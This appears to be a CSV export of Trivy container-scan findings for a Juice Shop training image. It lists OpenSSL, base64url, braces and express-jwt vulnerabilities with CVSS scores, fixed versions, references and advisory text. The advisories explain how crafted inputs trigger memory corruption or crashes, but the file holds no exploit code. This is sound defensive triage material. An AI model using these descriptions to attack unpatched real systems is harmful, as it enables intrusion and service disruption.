https://bugzilla.redhat.com/show_bug.cgi?id=2430201 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2431196 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15281 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-0861 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-0915 NEWLINE https://errata.almalinux.org/9/ALSA-2026-2786.html NEWLINE https://errata.rockylinux.org/RLSA-2026:2786 NEWLINE https://linux.oracle.com/cve/CVE-2026-0861.html NEWLINE https://linux.oracle.com/errata/ELSA-2026-50120.html NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-0861 NEWLINE https://sourceware.org/bugzilla/show_bug.cgi?id=33796 NEWLINE https://sourceware.org/git/?p=glibc.git;a=blob_plain;f=advisories/GLIBC-SA-2026-0001 NEWLINE https://ubuntu.com/security/notices/USN-8005-1 NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-0861,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2026-0861 Libc6 2.36-9+deb12u10,False,False,,2026-05-12 17:37:04.792379+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-0861,debian; os-pkgs,"Active, Verified", +,,True,0,[],libssl3,3.0.17-1~deb12u2,2026-05-12 17:37:04.887081+00:00,CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N,7.4,,,787,2026-05-12,,,"openssl: OpenSSL: Arbitrary code execution due to out-of-bounds write in PKCS#12 processing NEWLINE **Target:** bkimminich/juice-shop:v19.0.0 (debian 12.11) NEWLINE **Type:** debian NEWLINE **Fixed version:** 3.0.18-1~deb12u2 NEWLINE NEWLINE Issue summary: Calling PKCS12_get_friendlyname() function on a maliciously NEWLINE crafted PKCS#12 file with a BMPString (UTF-16BE) friendly name containing NEWLINE non-ASCII BMP code point can trigger a one byte write before the allocated NEWLINE buffer. NEWLINE NEWLINE Impact summary: The out-of-bounds write can cause a memory corruption NEWLINE which can have various consequences including a Denial of Service. NEWLINE NEWLINE The OPENSSL_uni2utf8() function performs a two-pass conversion of a PKCS#12 NEWLINE BMPString (UTF-16BE) to UTF-8. In the second pass, when emitting UTF-8 bytes, NEWLINE the helper function bmp_to_utf8() incorrectly forwards the remaining UTF-16 NEWLINE source byte count as the destination buffer capacity to UTF8_putc(). For BMP NEWLINE code points above U+07FF, UTF-8 requires three bytes, but the forwarded NEWLINE capacity can be just two bytes. UTF8_putc() then returns -1, and this negative NEWLINE value is added to the output length without validation, causing the NEWLINE length to become negative. The subsequent trailing NUL byte is then written NEWLINE at a negative offset, causing write outside of heap allocated buffer. NEWLINE NEWLINE The vulnerability is reachable via the public PKCS12_get_friendlyname() API NEWLINE when parsing attacker-controlled PKCS#12 files. While PKCS12_parse() uses a NEWLINE different code path that avoids this issue, PKCS12_get_friendlyname() directly NEWLINE invokes the vulnerable function. Exploitation requires an attacker to provide NEWLINE a malicious PKCS#12 file to be parsed by the application and the attacker NEWLINE can just trigger a one zero byte write before the allocated buffer. NEWLINE For that reason the issue was assessed as Low severity according to our NEWLINE Security Policy. NEWLINE NEWLINE The FIPS modules in 3.6, 3.5, 3.4, 3.3 and 3.0 are not affected by this issue, NEWLINE as the PKCS#12 implementation is outside the OpenSSL FIPS module boundary. NEWLINE NEWLINE OpenSSL 3.6, 3.5, 3.4, 3.3, 3.0 and 1.1.1 are vulnerable to this issue. NEWLINE NEWLINE OpenSSL 1.0.2 is not affected by this issue. NEWLINE ",False,,,False,,,,False,bkimminich/juice-shop:v19.0.0 (debian 12.11),,True,,False,False,,False,,661527917bdf4cb885d4c2581cd30e6b1ac301b05d02d5d7c927e6c7e4133f10,51,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:04.887141+00:00,,,,,0,[],3.0.18-1~deb12u2,,S1,False,,,,,,,,False,https://access.redhat.com/errata/RHSA-2026:4472 NEWLINE https://access.redhat.com/security/cve/CVE-2025-69419 NEWLINE https://bugzilla.redhat.com/2430386 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2430375 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2430376 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2430377 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2430378 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2430379 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2430380 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2430381 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2430386 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2430387 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2430388 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2430389 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2430390 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-11187 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15467 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15468 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15469 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-66199 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-68160 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69418 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69419 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69420 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69421 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-22795 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-22796 NEWLINE https://errata.almalinux.org/9/ALSA-2026-4472.html NEWLINE https://errata.rockylinux.org/RLSA-2026:1473 NEWLINE https://github.com/advisories/GHSA-x77r-97gw-wh89 NEWLINE https://github.com/openssl/openssl/commit/41be0f216404f14457bbf3b9cc488dba60b49296 NEWLINE https://github.com/openssl/openssl/commit/7e9cac9832e4705b91987c2474ed06a37a93cecb NEWLINE https://github.com/openssl/openssl/commit/a26a90d38edec3748566129d824e664b54bee2e2 NEWLINE https://github.com/openssl/openssl/commit/cda12de3bc0e333ea8d2c6fd15001dbdaf280015 NEWLINE https://github.com/openssl/openssl/commit/ff628933755075446bca8307e8417c14d164b535 NEWLINE https://linux.oracle.com/cve/CVE-2025-69419.html NEWLINE https://linux.oracle.com/errata/ELSA-2026-50131.html NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2025-69419 NEWLINE https://openssl-library.org/news/secadv/20260127.txt NEWLINE https://ubuntu.com/security/notices/USN-7980-1 NEWLINE https://ubuntu.com/security/notices/USN-7980-2 NEWLINE https://www.cve.org/CVERecord?id=CVE-2025-69419,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2025-69419 Libssl3 3.0.17-1~deb12u2,False,False,,2026-05-12 17:37:04.887090+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2025-69419,debian; os-pkgs,"Active, Verified", +,,True,0,[],libssl3,3.0.17-1~deb12u2,2026-05-12 17:37:04.891364+00:00,CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H,7.5,,,476,2026-05-12,,,"openssl: OpenSSL: Denial of Service via malformed PKCS#12 file processing NEWLINE **Target:** bkimminich/juice-shop:v19.0.0 (debian 12.11) NEWLINE **Type:** debian NEWLINE **Fixed version:** 3.0.18-1~deb12u2 NEWLINE NEWLINE Issue summary: Processing a malformed PKCS#12 file can trigger a NULL pointer NEWLINE dereference in the PKCS12_item_decrypt_d2i_ex() function. NEWLINE NEWLINE Impact summary: A NULL pointer dereference can trigger a crash which leads to NEWLINE Denial of Service for an application processing PKCS#12 files. NEWLINE NEWLINE The PKCS12_item_decrypt_d2i_ex() function does not check whether the oct NEWLINE parameter is NULL before dereferencing it. When called from NEWLINE PKCS12_unpack_p7encdata() with a malformed PKCS#12 file, this parameter can NEWLINE be NULL, causing a crash. The vulnerability is limited to Denial of Service NEWLINE and cannot be escalated to achieve code execution or memory disclosure. NEWLINE NEWLINE Exploiting this issue requires an attacker to provide a malformed PKCS#12 file NEWLINE to an application that processes it. For that reason the issue was assessed as NEWLINE Low severity according to our Security Policy. NEWLINE NEWLINE The FIPS modules in 3.6, 3.5, 3.4, 3.3 and 3.0 are not affected by this issue, NEWLINE as the PKCS#12 implementation is outside the OpenSSL FIPS module boundary. NEWLINE NEWLINE OpenSSL 3.6, 3.5, 3.4, 3.3, 3.0, 1.1.1 and 1.0.2 are vulnerable to this issue. NEWLINE ",False,,,False,,,,False,bkimminich/juice-shop:v19.0.0 (debian 12.11),,True,,False,False,,False,,1fe4b7708e906afecfba5150b323f06ded2fa21e8f6847518f3045ecb05d35ea,52,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:04.891419+00:00,,,,,0,[],3.0.18-1~deb12u2,,S1,False,,,,,,,,False,https://access.redhat.com/errata/RHSA-2026:1473 NEWLINE https://access.redhat.com/security/cve/CVE-2025-69421 NEWLINE https://bugzilla.redhat.com/2430375 NEWLINE https://bugzilla.redhat.com/2430376 NEWLINE https://bugzilla.redhat.com/2430377 NEWLINE https://bugzilla.redhat.com/2430378 NEWLINE https://bugzilla.redhat.com/2430379 NEWLINE https://bugzilla.redhat.com/2430380 NEWLINE https://bugzilla.redhat.com/2430381 NEWLINE https://bugzilla.redhat.com/2430386 NEWLINE https://bugzilla.redhat.com/2430387 NEWLINE https://bugzilla.redhat.com/2430388 NEWLINE https://bugzilla.redhat.com/2430389 NEWLINE https://bugzilla.redhat.com/2430390 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2430375 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2430376 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2430377 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2430378 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2430379 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2430380 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2430381 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2430386 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2430387 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2430388 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2430389 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2430390 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-11187 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15467 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15468 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15469 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-66199 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-68160 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69418 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69419 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69420 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69421 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-22795 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-22796 NEWLINE https://errata.almalinux.org/9/ALSA-2026-1473.html NEWLINE https://errata.rockylinux.org/RLSA-2026:1473 NEWLINE https://github.com/advisories/GHSA-w9rv-xc8m-cmqp NEWLINE https://github.com/openssl/openssl/commit/3524a29271f8191b8fd8a5257eb05173982a097b NEWLINE https://github.com/openssl/openssl/commit/36ecb4960872a4ce04bf6f1e1f4e78d75ec0c0c7 NEWLINE https://github.com/openssl/openssl/commit/4bbc8d41a72c842ce4077a8a3eccd1109aaf74bd NEWLINE https://github.com/openssl/openssl/commit/643986985cd1c21221f941129d76fe0c2785aeb3 NEWLINE https://github.com/openssl/openssl/commit/a2dbc539f0f9cc63832709fa5aa33ad9495eb19c NEWLINE https://linux.oracle.com/cve/CVE-2025-69421.html NEWLINE https://linux.oracle.com/errata/ELSA-2026-50081.html NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2025-69421 NEWLINE https://openssl-library.org/news/secadv/20260127.txt NEWLINE https://ubuntu.com/security/notices/USN-7980-1 NEWLINE https://ubuntu.com/security/notices/USN-7980-2 NEWLINE https://www.cve.org/CVERecord?id=CVE-2025-69421,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2025-69421 Libssl3 3.0.17-1~deb12u2,False,False,,2026-05-12 17:37:04.891372+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2025-69421,debian; os-pkgs,"Active, Verified", +,,True,0,[],libssl3,3.0.17-1~deb12u2,2026-05-12 17:37:04.895080+00:00,CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H,8.1,,,416,2026-05-12,,,"openssl: OpenSSL: Arbitrary code execution due to use-after-free in DANE TLSA authentication NEWLINE **Target:** bkimminich/juice-shop:v19.0.0 (debian 12.11) NEWLINE **Type:** debian NEWLINE **Fixed version:** 3.0.19-1~deb12u2 NEWLINE NEWLINE Issue summary: An uncommon configuration of clients performing DANE TLSA-based NEWLINE server authentication, when paired with uncommon server DANE TLSA records, may NEWLINE result in a use-after-free and/or double-free on the client side. NEWLINE NEWLINE Impact summary: A use after free can have a range of potential consequences NEWLINE such as the corruption of valid data, crashes or execution of arbitrary code. NEWLINE NEWLINE However, the issue only affects clients that make use of TLSA records with both NEWLINE the PKIX-TA(0/PKIX-EE(1) certificate usages and the DANE-TA(2) certificate NEWLINE usage. NEWLINE NEWLINE By far the most common deployment of DANE is in SMTP MTAs for which RFC7672 NEWLINE recommends that clients treat as 'unusable' any TLSA records that have the PKIX NEWLINE certificate usages. These SMTP (or other similar) clients are not vulnerable NEWLINE to this issue. Conversely, any clients that support only the PKIX usages, and NEWLINE ignore the DANE-TA(2) usage are also not vulnerable. NEWLINE NEWLINE The client would also need to be communicating with a server that publishes a NEWLINE TLSA RRset with both types of TLSA records. NEWLINE NEWLINE No FIPS modules are affected by this issue, the problem code is outside the NEWLINE FIPS module boundary. NEWLINE ",False,,,False,,,,False,bkimminich/juice-shop:v19.0.0 (debian 12.11),,True,,False,False,,False,,94a9556a163cfe49793dd68a6e3901e59f6247a5f9a1259a5db736b53d98d81c,53,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:04.895142+00:00,,,,,0,[],3.0.19-1~deb12u2,,S1,False,,,,,,,,False,https://access.redhat.com/security/cve/CVE-2026-28387 NEWLINE https://github.com/openssl/openssl/commit/07e727d304746edb49a98ee8f6ab00256e1f012b NEWLINE https://github.com/openssl/openssl/commit/258a8f63b26995ba357f4326da00e19e29c6acbe NEWLINE https://github.com/openssl/openssl/commit/444958deaf450aea819171f97ae69eaedede42c3 NEWLINE https://github.com/openssl/openssl/commit/7a4e08cee62a728d32e60b0de89e6764339df0a7 NEWLINE https://github.com/openssl/openssl/commit/ec03fa050b3346997ed9c5fef3d0e16ad7db8177 NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-28387 NEWLINE https://openssl-library.org/news/secadv/20260407.txt NEWLINE https://ubuntu.com/security/notices/USN-8155-1 NEWLINE https://ubuntu.com/security/notices/USN-8155-2 NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-28387 NEWLINE https://www.openwall.com/lists/oss-security/2026/04/07/11,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2026-28387 Libssl3 3.0.17-1~deb12u2,False,False,,2026-05-12 17:37:04.895093+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-28387,debian; os-pkgs,"Active, Verified", +,,True,0,[],libssl3,3.0.17-1~deb12u2,2026-05-12 17:37:04.899365+00:00,CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H,7.5,,,476,2026-05-12,,,"openssl: OpenSSL: Denial of Service due to NULL pointer dereference in delta CRL processing NEWLINE **Target:** bkimminich/juice-shop:v19.0.0 (debian 12.11) NEWLINE **Type:** debian NEWLINE **Fixed version:** 3.0.19-1~deb12u2 NEWLINE NEWLINE Issue summary: When a delta CRL that contains a Delta CRL Indicator extension NEWLINE is processed a NULL pointer dereference might happen if the required CRL NEWLINE Number extension is missing. NEWLINE NEWLINE Impact summary: A NULL pointer dereference can trigger a crash which NEWLINE leads to a Denial of Service for an application. NEWLINE NEWLINE When CRL processing and delta CRL processing is enabled during X.509 NEWLINE certificate verification, the delta CRL processing does not check NEWLINE whether the CRL Number extension is NULL before dereferencing it. NEWLINE When a malformed delta CRL file is being processed, this parameter NEWLINE can be NULL, causing a NULL pointer dereference. NEWLINE NEWLINE Exploiting this issue requires the X509_V_FLAG_USE_DELTAS flag to be enabled in NEWLINE the verification context, the certificate being verified to contain a NEWLINE freshestCRL extension or the base CRL to have the EXFLAG_FRESHEST flag set, and NEWLINE an attacker to provide a malformed CRL to an application that processes it. NEWLINE NEWLINE The vulnerability is limited to Denial of Service and cannot be escalated to NEWLINE achieve code execution or memory disclosure. For that reason the issue was NEWLINE assessed as Low severity according to our Security Policy. NEWLINE NEWLINE The FIPS modules in 3.6, 3.5, 3.4, 3.3 and 3.0 are not affected by this issue, NEWLINE as the affected code is outside the OpenSSL FIPS module boundary. NEWLINE ",False,,,False,,,,False,bkimminich/juice-shop:v19.0.0 (debian 12.11),,True,,False,False,,False,,09ad92fad52011d71a7d61e39e5ae440d190fa5cb7c22a24a5a2306f9a0428bd,54,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:04.899426+00:00,,,,,0,[],3.0.19-1~deb12u2,,S1,False,,,,,,,,False,https://access.redhat.com/security/cve/CVE-2026-28388 NEWLINE https://github.com/openssl/openssl/commit/59c3b3158553ab53275bbbccca5cb305d591cf2e NEWLINE https://github.com/openssl/openssl/commit/5a0b4930779cd2408880979db765db919da55139 NEWLINE https://github.com/openssl/openssl/commit/602542f2c0c2d5edb47128f93eac10b62aeeefb3 NEWLINE https://github.com/openssl/openssl/commit/a9d187dd1000130100fa7ab915f8513532cb3bb8 NEWLINE https://github.com/openssl/openssl/commit/d3a901e8d9f021f3e67d6cfbc12e768129862726 NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-28388 NEWLINE https://openssl-library.org/news/secadv/20260407.txt NEWLINE https://ubuntu.com/security/notices/USN-8155-1 NEWLINE https://ubuntu.com/security/notices/USN-8155-2 NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-28388 NEWLINE https://www.openwall.com/lists/oss-security/2026/04/07/11,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2026-28388 Libssl3 3.0.17-1~deb12u2,False,False,,2026-05-12 17:37:04.899374+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-28388,debian; os-pkgs,"Active, Verified", +,,True,0,[],libssl3,3.0.17-1~deb12u2,2026-05-12 17:37:04.903319+00:00,CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H,7.5,,,476,2026-05-12,,,"openssl: OpenSSL: Denial of Service vulnerability in CMS processing NEWLINE **Target:** bkimminich/juice-shop:v19.0.0 (debian 12.11) NEWLINE **Type:** debian NEWLINE **Fixed version:** 3.0.19-1~deb12u2 NEWLINE NEWLINE Issue summary: During processing of a crafted CMS EnvelopedData message NEWLINE with KeyAgreeRecipientInfo a NULL pointer dereference can happen. NEWLINE NEWLINE Impact summary: Applications that process attacker-controlled CMS data may NEWLINE crash before authentication or cryptographic operations occur resulting in NEWLINE Denial of Service. NEWLINE NEWLINE When a CMS EnvelopedData message that uses KeyAgreeRecipientInfo is NEWLINE processed, the optional parameters field of KeyEncryptionAlgorithmIdentifier NEWLINE is examined without checking for its presence. This results in a NULL NEWLINE pointer dereference if the field is missing. NEWLINE NEWLINE Applications and services that call CMS_decrypt() on untrusted input NEWLINE (e.g., S/MIME processing or CMS-based protocols) are vulnerable. NEWLINE NEWLINE The FIPS modules in 3.6, 3.5, 3.4, 3.3 and 3.0 are not affected by this NEWLINE issue, as the affected code is outside the OpenSSL FIPS module boundary. NEWLINE ",False,,,False,,,,False,bkimminich/juice-shop:v19.0.0 (debian 12.11),,True,,False,False,,False,,a586469a8745f31bc1a7b97867d18b24a4857360173dd1f9deb328adfa579a37,55,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:04.903376+00:00,,,,,0,[],3.0.19-1~deb12u2,,S1,False,,,,,,,,False,https://access.redhat.com/security/cve/CVE-2026-28389 NEWLINE https://github.com/advisories/GHSA-7x88-9hgc-69gf NEWLINE https://github.com/openssl/openssl/commit/16cea4188e0ea567deb4f93f85902247e67384f5 NEWLINE https://github.com/openssl/openssl/commit/785cbf7ea3b5a6f5adf0c1ccb92b79d89c35c616 NEWLINE https://github.com/openssl/openssl/commit/7b5274e812400cacb6f3be4c2df5340923fa807f NEWLINE https://github.com/openssl/openssl/commit/c6725634e089eb2b634b10ede33944be7248172a NEWLINE https://github.com/openssl/openssl/commit/f80f83bc5fd036bc47d773e8b15a001e2b4ce686 NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-28389 NEWLINE https://openssl-library.org/news/secadv/20260407.txt NEWLINE https://ubuntu.com/security/notices/USN-8155-1 NEWLINE https://ubuntu.com/security/notices/USN-8155-2 NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-28389 NEWLINE https://www.openwall.com/lists/oss-security/2026/04/07/11,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2026-28389 Libssl3 3.0.17-1~deb12u2,False,False,,2026-05-12 17:37:04.903328+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-28389,debian; os-pkgs,"Active, Verified", +,,True,0,[],libssl3,3.0.17-1~deb12u2,2026-05-12 17:37:04.907012+00:00,CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H,7.5,,,476,2026-05-12,,,"openssl: OpenSSL: Denial of Service due to NULL pointer dereference in CMS EnvelopedData processing NEWLINE **Target:** bkimminich/juice-shop:v19.0.0 (debian 12.11) NEWLINE **Type:** debian NEWLINE **Fixed version:** 3.0.19-1~deb12u2 NEWLINE NEWLINE Issue summary: During processing of a crafted CMS EnvelopedData message NEWLINE with KeyTransportRecipientInfo a NULL pointer dereference can happen. NEWLINE NEWLINE Impact summary: Applications that process attacker-controlled CMS data may NEWLINE crash before authentication or cryptographic operations occur resulting in NEWLINE Denial of Service. NEWLINE NEWLINE When a CMS EnvelopedData message that uses KeyTransportRecipientInfo with NEWLINE RSA-OAEP encryption is processed, the optional parameters field of NEWLINE RSA-OAEP SourceFunc algorithm identifier is examined without checking NEWLINE for its presence. This results in a NULL pointer dereference if the field NEWLINE is missing. NEWLINE NEWLINE Applications and services that call CMS_decrypt() on untrusted input NEWLINE (e.g., S/MIME processing or CMS-based protocols) are vulnerable. NEWLINE NEWLINE The FIPS modules in 3.6, 3.5, 3.4, 3.3 and 3.0 are not affected by this NEWLINE issue, as the affected code is outside the OpenSSL FIPS module boundary. NEWLINE ",False,,,False,,,,False,bkimminich/juice-shop:v19.0.0 (debian 12.11),,True,,False,False,,False,,94d7dcf984f5babda61d73e7274780d57b0f82a560528099a162a467e6d92c40,56,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:04.907093+00:00,,,,,0,[],3.0.19-1~deb12u2,,S1,False,,,,,,,,False,https://access.redhat.com/security/cve/CVE-2026-28390 NEWLINE https://github.com/openssl/openssl/commit/01194a8f1941115cd0383bfa91c736dd3993c8bc NEWLINE https://github.com/openssl/openssl/commit/2e39b7a6993be445fddb9fbce316fa756e0397b6 NEWLINE https://github.com/openssl/openssl/commit/af2a5fecd3e71a29e7568f9c1453dec5cebbaff4 NEWLINE https://github.com/openssl/openssl/commit/ea7b4ea4f9f853521ba34830cbcadc970d2e0788 NEWLINE https://github.com/openssl/openssl/commit/fd2f1a6cf53b9ceeca723a001aa4b825d7c7ee75 NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-28390 NEWLINE https://openssl-library.org/news/secadv/20260407.txt NEWLINE https://ubuntu.com/security/notices/USN-8155-1 NEWLINE https://ubuntu.com/security/notices/USN-8155-2 NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-28390 NEWLINE https://www.openwall.com/lists/oss-security/2026/04/07/11,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2026-28390 Libssl3 3.0.17-1~deb12u2,False,False,,2026-05-12 17:37:04.907022+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-28390,debian; os-pkgs,"Active, Verified", +,,True,0,[],base64url,0.0.6,2026-05-12 17:37:04.963142+00:00,,,,,0,2026-05-12,,,Out-of-bounds Read NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** >=3.0.0 NEWLINE NEWLINE `base64url` allocates uninitialized Buffers when number is passed in input on Node.js 4.x and below NEWLINE ,False,,,False,,,,False,juice-shop/node_modules/base64url/package.json,,True,,False,False,,False,,be151895c91d23d77b7d6356209b590633dac21e5af1e47b9758081ce5118e47,69,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:04.963200+00:00,,,,,0,[],>=3.0.0,,S1,False,,,,,,,,False,https://github.com/brianloveswords/base64url/pull/25 NEWLINE https://hackerone.com/reports/321687,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,NSWG-ECO-428 Base64url 0.0.6,False,False,,2026-05-12 17:37:04.963150+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,NSWG-ECO-428,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],braces,2.3.2,2026-05-12 17:37:05.018151+00:00,CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H,7.5,,,1050,2026-05-12,,,"braces: fails to limit the number of characters it can handle NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 3.0.3 NEWLINE NEWLINE The NPM package `braces`, versions prior to 3.0.3, fails to limit the number of characters it can handle, which could lead to Memory Exhaustion. In `lib/parse.js,` if a malicious user sends ""imbalanced braces"" as input, the parsing will enter a loop, which will cause the program to start allocating heap memory without freeing it at any moment of the loop. Eventually, the JavaScript heap limit is reached, and the program will crash. NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/braces/package.json,,True,,False,False,,False,,568df38b03dd302ca712ae63e22d3ae68d4f6547f7304d6347552b380e39ec58,83,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.018203+00:00,,,,,0,[],3.0.3,,S1,False,,,,,,,,False,https://access.redhat.com/security/cve/CVE-2024-4068 NEWLINE https://devhub.checkmarx.com/cve-details/CVE-2024-4068 NEWLINE https://devhub.checkmarx.com/cve-details/CVE-2024-4068/ NEWLINE https://github.com/micromatch/braces NEWLINE https://github.com/micromatch/braces/blob/98414f9f1fabe021736e26836d8306d5de747e0d/lib/parse.js#L308 NEWLINE https://github.com/micromatch/braces/commit/415d660c3002d1ab7e63dbf490c9851da80596ff NEWLINE https://github.com/micromatch/braces/issues/35 NEWLINE https://github.com/micromatch/braces/pull/37 NEWLINE https://github.com/micromatch/braces/pull/40 NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2024-4068 NEWLINE https://www.cve.org/CVERecord?id=CVE-2024-4068,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2024-4068 Braces 2.3.2,False,False,,2026-05-12 17:37:05.018158+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2024-4068,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],express-jwt,0.1.3,2026-05-12 17:37:05.041517+00:00,CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:N,7.7,,,285,2026-05-12,,,"Authorization bypass in express-jwt NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 6.0.0 NEWLINE NEWLINE In express-jwt (NPM package) up and including version 5.3.3, the algorithms entry to be specified in the configuration is not being enforced. When algorithms is not specified in the configuration, with the combination of jwks-rsa, it may lead to authorization bypass. You are affected by this vulnerability if all of the following conditions apply: - You are using express-jwt - You do not have **algorithms** configured in your express-jwt configuration. - You are 